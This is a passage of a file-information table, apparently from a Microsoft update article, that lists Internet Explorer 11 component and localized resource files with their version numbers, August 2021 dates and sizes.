\nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 10,752 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 307,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 293,888 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 290,304 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 299,008 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 303,104 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 282,112 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 283,648 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 291,840 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 299,520 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 275,968 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 293,376 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 258,048 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 256,512 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 288,256 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 285,184 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 297,472 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 288,768 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 286,208 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 281,600 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 286,720 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 292,352 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 242,176 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 243,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 243,200 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 73,728 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 78,848 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 74,752 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 62,464 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 75,264 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 72,192 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 73,216 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 41,472 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 37,888 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 70,656 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 71,680 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 69,632 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 59,904 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 30,720 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.20112| 13-Aug-2021| 19:45| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.20112| 13-Aug-2021| 19:46| 230,912 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 46,080 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 51,712 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 54,272 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 45,056 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 39,936 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 39,424 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 51,200 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 35,328 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 11,264 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 9,216 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 73,728 \niedkcs32.dll| 18.0.9600.20112| 19-Aug-2021| 18:17| 341,920 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 20-Mar-2021| 20:53| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \ntdc.ocx| 11.0.9600.20112| 13-Aug-2021| 19:44| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20112| 13-Aug-2021| 20:06| 489,472 \niedvtool.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 38,912 \ndxtmsft.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 415,744 \ndxtrans.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 13-Aug-2021| 18:03| 11,892 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 175,104 \nF12Resources.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 76,800 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:33| 1,155,584 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:13| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 18:03| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 104,960 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:03| 47,616 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:13| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 20-Mar-2021| 21:02| 85,548 \nWindows Information Bar.wav| Not versioned| 20-Mar-2021| 21:02| 23,308 \nWindows Feed Discovered.wav| Not versioned| 20-Mar-2021| 21:02| 19,884 \nWindows Navigation Start.wav| Not versioned| 20-Mar-2021| 21:02| 11,340 \nbing.ico| Not versioned| 20-Mar-2021| 20:55| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:18| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 1,399,296 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 130,048 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 230,400 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 \nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \nie4uinit.exe| 11.0.9600.20112| 13-Aug-2021| 19:34| 692,224 \niernonce.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 30,720 \niesetup.dll| 11.0.9600.20112| 13-Aug-2021| 20:04| 62,464 \nieuinit.inf| Not versioned| 13-Aug-2021| 18:56| 16,303 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nTimeline.dll| 11.0.9600.20112| 